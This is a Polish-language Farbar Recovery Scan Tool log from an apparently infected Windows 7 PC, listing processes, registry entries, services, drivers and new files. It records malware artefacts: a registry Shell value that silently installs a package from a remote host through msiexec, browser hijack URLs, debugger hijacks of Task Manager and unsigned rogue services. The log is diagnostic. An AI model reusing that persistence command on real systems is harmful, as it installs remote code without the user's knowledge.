Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 08-05-2017
Uruchomiony przez Kamcio (administrator) KAMCIO-KOMPUTER (13-05-2017 10:14:00)
Uruchomiony z C:\Program1\programy virus
Załadowane profile: Kamcio (Dostępne profile: Kamcio)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvscpapisvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(AVAST Software) C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Mozilla Corporation) C:\Program Files (x86)\Firefox\Firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-14] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [35696 2009-02-27] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-04-26] (Valve Corporation)
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Run: [background_fault] => C:\Users\Kamcio\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SM8NSFdJXRURQRYM4NjVLMjUxNYMyFThWMdH2FTUcOF== /q
IFEO\DisplaySwitch.exe: [Debugger] 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Tcpip\Parameters: [DhcpNameServer] 217.172.224.170 89.231.1.206
Tcpip\..\Interfaces\{322BA05B-3C3C-4417-822E-CA0BB35803F3}: [DhcpNameServer] 217.172.224.170 89.231.1.206

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1286252044-1160479171-464530157-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1286252044-1160479171-464530157-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2016-02-09] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-13] (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-04] (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2016-01-13] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-04] (Oracle Corporation)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2016-02-09] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665

FireFox:
========
FF ProfilePath: C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887 [2017-05-12]
FF Homepage: Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665
FF Extension: (Disable Prefetch) - C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887\features\{f443a5a0-3169-4812-9558-5e3f66f2ae66}\disable-prefetch@mozilla.org.xpi [2017-04-05]
FF SearchPlugin: C:\Users\Kamcio\AppData\Roaming\Mozilla\Firefox\Profiles\ij5jke03.default-1489678360887\searchplugins\ourluckysites.xml [2017-05-09]
FF ProfilePath: C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887 [2017-05-13]
FF Homepage: Firefox\Firefox\Profiles\ij5jke03.default-1489678360887 -> about:newtab
FF Extension: (SimilarWeb) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF Extension: (HSearch) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [Brak podpisu cyfrowego]
FF Extension: (Polski Language Pack) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-03] [Brak podpisu cyfrowego]
FF Extension: (Disable Prefetch) - C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\features\{f443a5a0-3169-4812-9558-5e3f66f2ae66}\disable-prefetch@mozilla.org.xpi [2017-04-05]
FF SearchPlugin: C:\Users\Kamcio\AppData\Roaming\Firefox\Firefox\Profiles\ij5jke03.default-1489678360887\searchplugins\startsearch.xml [2017-05-03]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-29] [Brak podpisu cyfrowego]
FF HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Kamcio\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi
FF Extension: (Ace Stream Web Extension) - C:\Users\Kamcio\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2017-01-31]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-07-11] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-07-11] (NVIDIA Corporation)
FF Plugin HKU\S-1-5-21-1286252044-1160479171-464530157-1000: @acestream.net/acestreamplugin,version=3.1.16.1 -> C:\Users\Kamcio\AppData\Roaming\ACEStream\player\npace_plugin.dll [2017-01-13] (Innovative Digital Technologies)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-02-09] (Microsoft Corporation)
StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494321453&z=0d8671712f644bc88fff96agbz9t7zbcfo3gez5z0q&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665

Chrome:
=======
CHR HKU\S-1-5-21-1286252044-1160479171-464530157-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [Brak podpisu cyfrowego]
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [241936 2016-08-13] (EasyAntiCheat Ltd)
S4 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107672 2017-05-03] () <==== UWAGA
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-14] (NVIDIA Corporation)
R2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [105984 2017-05-03] () [Brak podpisu cyfrowego]
S4 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] () [Brak podpisu cyfrowego]
R2 Kitty; C:\Users\Kamcio\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [Brak podpisu cyfrowego] <==== UWAGA
S2 NPASRE; C:\Users\Kamcio\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-14] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-14] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-14] (NVIDIA Corporation)
R2 SNARE; C:\Users\Kamcio\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
R2 SNAREA; C:\Users\Kamcio\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
S4 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 VNASRE; C:\Users\Kamcio\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 WANARE; C:\Users\Kamcio\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-06-10] (Microsoft Corporation)
R2 WinSAPSvc; C:\Users\Kamcio\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Brak podpisu cyfrowego] <==== UWAGA
S2 3DM; C:\Users\Kamcio\AppData\Local\3DM\Kitty.dll [X]
S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [X]

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-14] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA
S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA
S1 iSafeNetFilter; system32\DRIVERS\iSafeNetFilter.sys [X] <==== UWAGA
S2 MBAMChameleon; \SystemRoot\system32\drivers\MBAMChameleon.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiąc - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-05-13 10:13 - 2017-05-13 10:14 - 00000000 ____D C:\FRST
2017-05-12 20:04 - 2017-05-12 20:04 - 00000000 ____D C:\Windows\system32\appmgmt
2017-05-12 16:46 - 2017-05-12 16:46 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Sun
2017-05-12 16:42 - 2017-05-12 16:42 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Macromedia
2017-05-12 09:57 - 2017-05-13 08:02 - 00000000 ____D C:\Users\Kamcio\AppData\LocalLow\Mozilla
2017-05-11 12:58 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-11 12:57 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-11 12:53 - 2017-05-11 12:57 - 00000000 ____D C:\Users\Kamcio\AppData\Local\NPASRE
2017-05-11 11:37 - 2017-05-11 11:37 - 00000000 ___HD C:\_acestream_cache_
2017-05-11 11:31 - 2017-05-12 09:44 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\.ACEStream
2017-05-11 11:30 - 2017-05-11 11:30 - 00001986 _____ C:\Users\Kamcio\Desktop\Ace Stream Media Center.lnk
2017-05-11 11:30 - 2017-05-11 11:30 - 00001882 _____ C:\Users\Kamcio\Desktop\Ace Player.lnk
2017-05-11 11:30 - 2017-05-11 11:30 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\ACEStream
2017-05-11 11:30 - 2017-05-11 11:30 - 00000000 ____D C:\Users\Kamcio\AppData\LocalLow\.ACEStream
2017-05-10 22:28 - 2017-05-10 22:28 - 00068590 _____ C:\Users\Kamcio\Desktop\rata2.pdf
2017-05-09 14:10 - 2017-05-12 11:46 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-09 11:14 - 2017-05-09 11:14 - 00000000 ____D C:\Users\Kamcio\AppData\Local\VNASRE
2017-05-08 20:25 - 2017-05-08 20:25 - 00000000 ____D C:\Users\Public\Documents\chrome
2017-05-05 12:19 - 2017-05-12 11:46 - 00001973 _____ C:\Users\Kamcio\Desktop\BigFarm.lnk
2017-05-05 12:15 - 2017-05-05 12:15 - 00000000 ____D C:\Users\Kamcio\AppData\Local\WANARE
2017-05-04 18:24 - 2017-05-12 20:56 - 00000000 ____D C:\Users\Kamcio\AppData\Local\background_fault
2017-05-03 14:35 - 2017-05-03 14:35 - 00000000 _____ C:\Windows\SysWOW64\33
2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Dayglad
2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-03 14:33 - 2017-05-03 14:33 - 00000000 ____D C:\Program Files (x86)\Dayglad
2017-05-03 14:32 - 2017-05-11 14:35 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-03 14:32 - 2017-05-05 12:19 - 00003506 _____ C:\Windows\System32\Tasks\Windows-PG
2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Windows\psgo
2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Users\Kamcio\AppData\Local\SNAREA
2017-05-03 14:32 - 2017-05-03 14:32 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Kitty
2017-05-02 11:11 - 2017-05-12 11:46 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\WinSAPSvc
2017-05-02 11:11 - 2017-05-02 11:11 - 00000000 ____D C:\Users\Kamcio\AppData\Local\SNARE
2017-04-26 14:35 - 2017-04-26 14:35 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Everness
2017-04-26 14:34 - 2017-04-26 14:34 - 00000000 ____D C:\Program Files (x86)\Everness
2017-04-25 11:55 - 2017-04-25 11:55 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Doeye
2017-04-25 11:55 - 2017-04-25 11:55 - 00000000 ____D C:\Program Files (x86)\Doeye
2017-04-20 17:36 - 2017-04-25 12:00 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-20 17:34 - 2017-05-11 14:34 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-19 13:55 - 2017-04-19 13:55 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Dohat
2017-04-19 13:55 - 2017-04-19 13:55 - 00000000 ____D C:\Program Files (x86)\Dohat
2017-04-17 19:24 - 2017-04-17 19:24 - 00067836 _____ C:\Users\Kamcio\Desktop\OTL1111.Txt
2017-04-17 19:24 - 2017-04-17 19:24 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-17 18:21 - 2017-04-17 18:21 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Google
2017-04-17 18:21 - 2017-04-17 18:21 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Eastness
2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Windows\system32\log
2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Elex-tech
2017-04-17 17:38 - 2017-04-17 17:38 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-17 17:38 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-17 17:35 - 2017-05-12 15:56 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 17:35 - 2017-05-03 14:33 - 00002150 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\Firefox
2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Users\Kamcio\AppData\Local\Firefox
2017-04-17 17:35 - 2017-04-17 17:35 - 00000000 ____D C:\Program Files (x86)\Eastness
2017-04-17 17:34 - 2017-05-13 07:55 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 17:34 - 2017-05-12 11:46 - 00003576 _____ C:\Windows\System32\Tasks\Milimili
2017-04-17 17:34 - 2017-04-25 16:59 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 14:19 - 2017-04-13 14:20 - 00003578 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:18 - 2017-04-13 14:18 - 00000000 ____D C:\Users\Kamcio\AppData\Roaming\SSMgre

==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

